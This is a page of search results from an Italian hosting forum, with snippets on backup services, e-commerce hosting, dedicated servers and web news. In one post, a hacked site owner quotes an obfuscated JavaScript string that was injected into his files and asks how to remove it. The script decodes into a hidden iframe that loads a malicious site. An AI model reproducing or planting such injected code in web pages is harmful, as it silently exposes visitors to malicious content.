Jump to content

Search the Community

Showing results for tags 'online'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Richiesta informazioni e consigli hosting
    • Domini e Registrazioni
    • Shared e Managed Webhosting
    • WebHosting - Primi passi
    • Server dedicati, colocation, connettività e scelta data center
    • VPS - Virtual Private Server
    • Cloud Computing e Cloud Hosting
    • Gestione Server Windows e Server Linux
    • E-mail e Managed Services
    • Pannelli di controllo e Hosting software
    • Professione Hosting Provider
  • Sviluppo Web e Tempo Libero
    • Io Programmo
    • Promozione, advertising e SEO
    • Off-Topic
    • Il tuo sito
  • Guide su hosting, domini, server, CMS e Cloud Computing
    • Articoli e Guide su hosting, domini e cloud computing
    • Annunci e News
    • Offerte Hosting - Provider HostingTalk.it

Calendars

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografia


Località


Interessi


Cosa fai nella vita?


Il tuo Hosting Provider?

Found 76 results

  1. Intendo la registrazione dell'account. Prendo spunto da una cosa che mi è capitato di legger oggi cercando altro. L'autore dell'articolo (purtroppo non ho preso nota e mi è sfuggito) sostiene che rende di più l'ecommerce che non costringe a registrare un account, anche se poi i dati tocca lasciarli comunque. La percezione del cliente sarebbe che lascia i dati personali una tantum, gli arriva la roba ma non è schedato e/o fidelizzato. Sono fondamentalmente d'accordo, in un'era in cui la gente racconta vita, morte e miracoli su facebook o al primo intervistatore con una telecamera in mano, si fa mille problemi su informazioni che tutto sommato sono solo per la sua comodità: se torna ad acquistare sul sito non deve reinserire tutto. Il signore che leggevo oggi, raccomanda, se il software non permette l'acquisto senza registrazione, di cambiare e/o togliere la parola registrazione di mezzo, anche questa cosa mi trova d'accordo.
  2. xAnder

    Servizio di backup online

    Ciao, in questi giorni ho ricevuto lo spiacevole messaggio "Your Dropbox is full" e prima di acquistare il servizio pro da 75 € per 50 Gb, mi stavo guardando in giro per altre offerte. La versione PRO di dropbox dispone di uno snapshot che va oltre ai 30 giorni (versione pro) per poter ripristinare un singolo file. La ricerca presente all'interno dell'interfaccia usa come riferimenti solo il nome del file e non il suo contenuto. Sono passato sul sito di mozy e ho visto questo strano Unlimited Storage per 41€ l'anno Con un Restore file versions up to 30 days in the past. Poi sono capitato su backblaze che promette storage illimitato per 5$ al mese e la possibilità di spedirti un DVD o una pendrive con dentro i tuoi file. Infine ho trovato memopal, un servizio italiano molto interessante soprattutto per le caratteristiche che riporto qua sotto: Chissà se si possono cancellare per sempre questi file.. Non è ben chiaro se puoi cercare stringhe all'interno dei file, tuttavia sembra un ottimo servizio. L'ultimo servizio di storage che potrebbe essere usato come backup è Rackspace Cloud Files, ma non ho presente che tipo di interfaccia usa.. Tuttavia il prezzo sembra molto competitivo. Voi che servizio usate? Avete esperienza diretta con uno di questi?
  3. Google raccoglie la metà della pubblicità mobile e oltre un terzo di quella online guadagnando così la medaglia d'oro dei fatturati dell'intero settore del net advertising. A Mountain View seguono poi Facebook, Yahoo e Microsoft con percentuali di raccolta in... Continua a leggere, clicca qui.
  4. Sempre più editori scelgono la video pubblicità come veicolo per i propri messaggi promozionali, incrementando così gli investimenti in un settore in continua crescita e a cui iniziano a rivolgersi anche molte grandi aziende internazionali Continua a leggere, clicca qui.
  5. creephost

    Sito di giochi gratis online

    Una bella presentazione se la merita www.microgiochi.com Alla fin fine, è solo un sito per passarci un pò di tempo quando non hai niente da fare online (mi piace sminuire il lavoro...) ci sono quasi 5.000 giochi online, in flash ed altri plug-in del genere, giocabili totalmente con il prorpio browser.... piccolo dettaglio da non dimenticare è che sono giochi gratis non c'è bisogno di scaricare software aggiuntivi, né gli stessi giochi, insomma.... che ne pensate??? (siate cattivi....)
  6. Per una volta siamo più che felici di annunciare che la crescita della rete Italiana potrebbe essere la superiore in Europa rispetto a tutti gli altri paesi. Secondo la ricerca rilasciata da ComScore siamo cresciuti del 24% tra Aprile 2011 e Aprile 2012 nel numero di utenti Internet che accedono alla rete frequentemente; questo dato ci colloca anche come quarti per crescita nel mondo, come riportato anche dal grafico qui sotto: ... Continua a leggere, clicca qui.
  7. Mi serve almeno 500gb di spazio online per storage e backup personali (usando programmi poi come NetDrive posso mappare il drive come se fosse un hard disk sul mio pc e leggere i files) e poi mi serve spazio per il mio sito web (circa 1000 utenti internazionali al giorno con periodi con oltre 30000 utenti). Il mio sito non usa database, son pagine statiche che aggiorno io manualmente, quindi impiegano pochissime risorse di cpu e ram. Ho visto che in europa quello che cero me lo offre servage.com (mentre dreamhost.com non mi lascia usare lo spazio come storage). Oltre oceano ho visto hostgator (col suo piano da 1TB) e dot5hosting (che dà spazio illimitato) ma non so se mi permettono di usare lo spazio per storage online. Non ho pretese di avere backup seri dei miei files (li faccio già io da solo), ma voglio aver a disposizione i miei files ovunque ci sia internet (ovviamente li cripto prima di upparli). Inoltre non mi dispiace avere un uptime per il mio sito superiore a quello che in questo anno mi ha offerto Netsons con tutti i continui blackout e down improvvisi... Cosa mi consigliate? Mi fermo su servage.com o provo oltreoceano? edit: hostgator mi ha appena detto che non posso usare il suo spazio come storage... quindi cippa
  8. Ciao a tutti, per una volta tanto faccio io una domanda a voi :) Sono curioso di sapere quali sono i migliori sw commerciali e non che offrono la possibilità di creare aree guida online, FAQ. Ovvero qualcosa di simile ad un Wiki con alcune funzioni magari già preimpostate come la condivisione delle pagine, pubblicazione su social network e così via! Qualche nome? Grazie!
  9. Salve a tutti Spesso sento pareri discordanti riguardo questo punto: Per un azienda italiana che opera solo in Italia è possibile aprire un ecommerce (che vende anch'essi solo in Italia) ma poggiarsi su un server estero (tipo americano)? Oppure c'è qualche legge fiscale o sulla privacy che lo vieta?
  10. Un'azienda mi ha chiesto di stimare le potenzialità necessarie di un server capace di ospitare sullo stesso dominio 2 cms prestashop con 1000 ordini al mese ciascuno. Qualcuno di voi con un po' di esperienza nel campo saprebbe indicarmi un ordine di grandezza delle caratteristiche che dovrebbe avere il server (ram, ecc...) supponendo come sistema operativo linux? A presto e grazie
  11. Sto creando un nuovo magazine online, oramai finito e completato la grafica è tutta personalizzata e aggiornata, il sito si basa su piattaforma Wordpress ed è strutturato in CSS3 ed AJAX, il lavoro fatto è stato davvero molto arduo e il risultato ottenuto è davvero da maestri. Nel magazine sono già presenti articoli e ci sono varie persone che scrivono già sul sito. INOLTRE COMPRENDE LICENZA PER VBULLETIN GIA' INCLUSO NEL PORTALE. PREZZO 350€ IL PREZZO COMPRENDE: Dominio + Hosting su server Semidedicato (240€/annuali già pagati) + vBulletin (180€ di licenza per il forum) + Tutti i file del sito. Pagamento con Bonifico Bancario (preferito) o Postepay. Per chi è interessato a vedere il sito mi contatti sulla mia email mylotech@gmail.com, non voglio pubblicare il link.
  12. La proposta di AGCOM per risolvere il problema della pirateria online è finalmente arrivata, ora servono 60 giorni di consultazione pubblica per poi giungere ad una approvazione definitiva. Rispetto alle voci delle scorse settimane che vedevano per il caso italiano qualcosa di simile all'Hadopi francese, nel nostro paese non ci sarà alcuna disconnessione degli utenti dalla loro linea ADSL, nè tanto meno un controllo diretto dei file e dell'utilizzo della loro connessione. Un provvedimento che, come ha sottolineato Corrado Calabrò, non deve per nulla intaccare la privacy del cittadino nè tanto meno mettere dubbi sulla libertà della rete italiana. leggi tutto Leggi Pirateria online, l'AGCOM presenta la sua proposta per l'Italia
  13. Amazon Italia è online, da questa notte la compagnia ha portato online il sito web per il nostro paese e ha deciso di lasciare a Jeff Bezos, CEO di Amazon, l'introduzione della nuova avventura ai clienti italiani. L'apertura era stata già annunciata negli scorsi giorni, ma senza alcun alcun dettaglio in merito ai prodotti e alle novità per il nostro paese. "Caro cliente, leggi tutto Leggi Amazon.it è online
  14. Ciao a tutti, al momento sono in VPS ma a causa di un incremento di visite sono costretto a passare ad un dedicato, vorrei sapere che servizio mi consigliate Quello che mi serve è * Dedicato professionale * Budget 50€ / mese * Uptime alto * Server in Italia * Banda garantita + non limitata * Servizio Managed in modo da non avere scocciature in caso di attacchi * Linux * PHP5 * MySQL * Plesk con possibilità di aggiungere almeno 12 domini nello stesso server * Cron jobs * Possibilità di modificare i parametri del php.ini a piacimento * Possibilità di upgrade facile dell'hardware Al momento ho un sito da 15.000 unici al giorno che usa 1,54TB di banda al mese e un altro da 3.000 unici al giorno che usa 218,21 GB più altri siti minori Se avete bisogno di altre info per consigliarmi chiedete pure, grazie
  15. C'è fermento intorno al crescere dei contenuti online: mai come in questi mesi si parla di come monetizzare i contenuti, di quale sia la scelta giusta degli editori e di come poter applicare dei paywall online. Tanto è che i creatori di Techmeme.com hanno deciso di creare anche una versione esclusivamente dedicata a tracciare i post relativi a contenuti, news, paywall e quanto altro: si chiama Mediagazer Non so quale sia il parere comune, ma sembra che realmente vi sia oggi necessità di un sistema diverso dal solito AdSense e dalle forme classiche per monetizzare e promuovere i contenuti. Il problema è che: - Google continua ovviamente a promuovere il suo AdSense ma ad oggi anche il SEO per incrementare le visite diviene più oscuro, con continui cambi nell'algoritmo che a mio modo di vedere sono poco curati da Google almeno nel rapporto che ciò comporta per gli utenti e per la serp - I paywall funzionano male, le prime indiscrezioni sul Times parlano di 150K persone che hanno sottoscritto l'account free e solo 15K che poi hanno deciso effettivamente di pagare (lasciamo perdere dover pagare ad esempio 9 cent/euro a pagina per leggere Repubblica o Corriere su iPhone con H3G) - I contenuti non li produce più solamente il blogger, la redazione, o la casalinga che pubblica ricette di cucina sul suo sito: vi sono aziende che hanno come scopo solo quello di pubblicare e massimizzare i ricavi scegliendo le giuste keywords in funzione di AdSense o altri sistemi, e Google privilegia queste "fabbriche" moderne andando a stringere con loro accordi di partnership. - Gli editori, alcuni lottano contro e altri giocano con Google, per cui la partita ancora è da terminare: si dice che Google abbia già pronto un sistema da fare usare agli editori, ma quanti accetteranno e a quali condizioni? Mi sembra quindi che vi sia oggi un problema non da poco legato alla promozione ma anche alla monetizzazione dei contenuti online, qualcosa di cui si potrebbe discutere per ore, e che richiede anche una discreta conoscenza delle dinamiche del web e dell'iter che segue una pagina online prima di arrivare ad essere "monetizzata", ma vorrei sapere i tanti webmaster che sono presenti se si interessano di questo o se semplicemente non lo considerano (il loro blog, sito) una fonte che può creare reddito tale da porsi il problema :)
  16. Nonostante i problemi dovuti alle vicende Apple, Adobe non sembra essere concentrata solamente sul suo Flash, la compagnia ha infatti lanciato un prodotto del tutto nuovo nel panorama mondiale dei servizi online e dedicato alla firma elettronica dei documenti digitali. Il prodotto si chiama Adobe eSignatures, è un servizio fruibile direttamente online e in modo totalmente gratuito. Leggi Adobe eSignatures: firma digitale per i propri documenti direttamente online
  17. TheRegister riporta la curiosa vicenda di un attacco sferrato al sito del popolare cms PHP-Nuke, un vero e proprio veterano del mondo dei CMS, oggi ormai in secondo piano, ma ancora installato e utilizzato da migliaia di utenti e supportato, ovviamente da migliaia di provider di webhosting. Parliamo di un CMS la cui ultima versione online risale al 2007, e che si trova quindi con una vecchissima versione di PHP supportata e praticamente alcun aggiornamento ufficiale da parte della community. Leggi PHP-Nuke vittima di hacking, lasciato online per giorni. Ma la colpa è quasi sempre di PHP
  18. Buongiorno a tutti. Ho riscontrato la seguente problematica su gran parte dei siti ospitati sul mio server dedicato: alla fine dei file è stata aggiunta uan scringa javascript che mostra un popup che rimanda a qualche sito malevolo. Ritengo che il problema possa essere nel client FTP utilizzato fino ad ora dove le pass dei siti erano salvata in chiaro (Filezilla) unito ad un paio di malware sul mio PC. Domanda: esiste una utility o un codice per eliminare da tutti i file presenti online (a partire da /var/www/vhosts/ o da / per esempio) la stringa in maniera automatica? la stringa da eliminare è la seguente: <script> var test = '<45izzf55rza3m4eA AAszrcz=4\'hAt4t5p:/5/A3c4li4Ac5k34-A4zs4AaAz4pe4.54c434oz3m4/Ai54n.zc3gzA4iA4A?4245\'45 3w45iA3d43tz4h4zA=\'zA03p5x3\'A zhAeA4Ai5gA3hz5tz3=A5\'z0zAp5x4\'z s5t5yzzlAAe=5AA\'Av44i5z5sziz44bAzzi5lAi44t5Ay4A:5 hAi4zdzde5nzAA;AA A3AbzzAo4rzd3e4rz:44 znzAo4A5n35ez;54\'z3>A4A<AA3/AAiAfrzza35mAAe3>'.replace(/[Az345]/g,''); document.write(test); </script> Suggerimenti? Purtroppo non ho un backup abbastanza recente da utilizzare :(
  19. Avere dello spazio per memorizzare i propri file, siano essi fotografie, musica, documenti, o altro è una necessità sempre crescente. L’utilizzo di dispositivi di memorizzazione portatili, proprio per sostenere questa esigenza ha subito un incremento, e con il tempo sono aumentate le dimensioni e si sono ridotti i costi. Leggi il contenuto dell'articolo GSpace, salvare file in Gmail come archivio online
  20. Grazie alla progressiva diffusione di internet, avvenuta negli ultimi anni, alla quale abbiamo assistito anche nel nostro paese, la base di potenziale utenza alla quale una community si può rivolgere è aumentata notevolmente. Questo ha sicuramente contribuito alla crescita di persone convinte che bastino due minuti per creare un forum con qualche sezione e “qualcuno arriverà” (basta farsi un giro per forum free o simili e contare i forum con meno di 10 post per avere una conferma a questa tesi). Beh, purtroppo (o per fortuna), non è esattamente così che funziona. Leggi il contenuto dell'articolo Avviare e gestire una Community online - Prima parte
  21. Per ogni nuova tecnologia nascente solitamente si crea un indotto di aziende che producono servizi e prodotti direttamente collegati a quella tecnologia, a utilizzarla meglio, a renderla maggiormente controllabile, o semplicemente a modificarne degli aspetti apparentemente complessi. Il cloud computing ha così visto nascere intorno a se una serie di piattaforme che rispondono ad una sola esigenza: monitorare i server che ho presso un fornitore di cloud computing potendo raccogliere, da una unica schermata, tutti i datti essenziali nel lavoro di tutti i giorni. Leggi Cloudkick, il business nella gestione dei sistemi di cloud computing online
  22. Ricevo e pubblico con piacere una email di un nostro lettore che ha raggiunto HostingTalk.it via email e che ci chiede gentilmente consigli dopo aver letto qualche post del blog scritto da me e da Nicola. Di seguito la email di Claudio I ringraziamenti per i complimenti sono d'obbligo, ma veniamo ai consigli, cerco di dettagliarli il più possibile e divido il tutto in piu punti partendo pero dal punto '0' e poi continuando con i punti di Claudio. Punto 0, chi fa il sito e il sistema di ecommerce scelto Claudio, dici di avere un gran lavoro redazionale in atto per la creazione del tutto, ma non dici se il sito web verrà sviluppato da voi o meno, e nel caso su quale piattaforma di ecommerce. Al giorno d'oggi vi sono diverse soluzioni come sw di ecommerce, come OsCommerce, Magento ecc, è importante sapere da subito quale sceglierete, perchè la soluzione hosting a cui farete affidamento deve avere un supporto completo per questa applicazione. Inoltre, io penso che un sito di ecommerce che fa un investimento consistente nello studio e analisi del settore debba anche investire una buona somma nell'affidare la realizzazione ad una azienda professionista che possa mettere online un buon prodotto e aggiornare la piattaforma nel tempo :) Quindi su questo punto aspetto tue info per dare maggiori consigli! Punto 1, il dominio La questione è banale, la cosa migliore è prevedere un dominio .it per il vostro sito web italiano fin da subito, e registrare preventivamente anche la versione .com per vendere direttamente all'estero un domani. Tieni conto che entrambi è meglio registrarli contemporaneamente, avendo la certezza che il .com sarà in tuo possesso quando ne avrai bisogno. Entrambi i domini potranno poi puntare al tuo sito, facendo si che questo riconosca i visitatori italiani (sul .it) e quelli non italiani, portandoli sul .com e sulla versione in inglese del sito :) Direi per ora che queste estensioni sono più che sufficienti e non orientarti su altre Punto 2, pacchetto hosting Qui potrebbe essere utile una ricerca sulla nostra community con la parole "ecommerce hosting", vedrai che consigliamo sempre di affidarti ad un pacchetto che offra caratteristiche ben note e abbia uno SLA, ovvero delle garanzie. In questo caso il consiglio è di affidarti ad una azienda italiana che abbia pacchetti professionali, e scegliere direttamente con loro quello a te adatto in funzione dello spazio e funzionalità richieste (vedi punto 0). Per intenderci, evita aziende che offrono spazio illimitato, o che non hanno assistenza telefonica o tempi di intervento noti: questo per il semplice fatto che tu avrai un sito di ecommerce, nel caso di problemi devi poter parlare con qualcuno senza attendere troppo tempo. Una soluzione shared hosting va più che bene per iniziare, in futuro, se il sito crescerà potrai valutare altre soluzioni: diffida di chi parla di soluzioni dedicate, per un sito che va online da zero non servono e non ti garantirebbero la stessa qualità ad un costo maggiore. Punto 2, costi di gestione Per il solo hosting puoi partire da un pacchetto che costi intorno ai 200/300 Euro annuali, ottenendo già un ottimo servizio, ovviamente questo esclude eventuale gestione degli aggiornamenti del sito, che sono a tuo carico o dell'azienda a cui ti affidi per la creazione + gestione. Punto 3, richieste E' bene che tu esponga chiaramente le tue esigenze alla società a cui ti affidi, chieda loro i tempi di intervento stimati in caso di problemi e quali garanzie hai. Inoltre chiedi di avere un contratto leggibile e in cui siano dichiarate tutte le clausole inerenti il servizio: assicurati ad esempio che ci sia un backup (almeno settimanale) previsto e che il restore non sia vincolato al pagamento di alte somme o solo in determinate occasioni. Se la società ha un numero di telefono alza la cornetta e chiedi di parlare con un commerciale per fare tutte le domande del caso, se l'azienda ha un target professionale non avrà alcun problema a passare 15 min con te e spiegarti il tutto. Ricorda che la tua attività porta denaro, per cui è importante assicurarti di avere un'azienda solida, su cui puoi contare, nel caso di problemi. Pochi minuti fa un sito di ecommerce che gestisco non era raggiungibile su alcune linee, ho aperto un ticket e il tecnico ha appurato un problema loro interno da un x carrier. Questo è avvenuto in circa 10 min, ma non succede per caso, semplicemnte perchè la società offre un servizio professionale e il canone richiesto è per questa tipologia di target. Un esempio banale e reale per dirti che è importante in questo contesto avere una assistenza rapida e utile. Punto 4, altri consigli Il consiglio è quello di fare una analisi attenta prima di ordinare il tuo hosting, contattare diverse società e tornare eventualmente a discuterne con noi. Oltre a questo, direi che attendiamo tue maggiori informazioni per fornirti (non solo io :) ) altri consigli ;)
  23. Nel corso della scorsa settimana Sun Microsystems ha annunciato il rilascio della versione di Java EE6, il primo grande aggiornamento per il noto linguaggio di sviluppo da oltre tre anni. Leggi Java EE6 è online, le novità di Sun
  24. leggi tutto Leggi il resto di Online la pagina Facebook ufficiale di HostingTalk.it sul blog di HostingTalk.it
  25. Il noto provider di soluzioni hosting PEER 1 e GigaOM saranno uniti nella presentazione di un live stream sul futuro dell'hosting, in programma per il 3 Dicembre. La tavola rotonda, organizzata dal team di PEER 1, si pone come obiettivo quello di discutere, insieme a nomi noti del settore hosting, quale sia il futuro per questo mercato, quali sfide lo attendano e soprattutto quale sia attualmente la migliore tecnologia acquistabile dagli imprenditori che avviano una attività nel settore hosting. Leggi Peer 1 e GigaOM in un live stream online sul futuro dell'hosting
×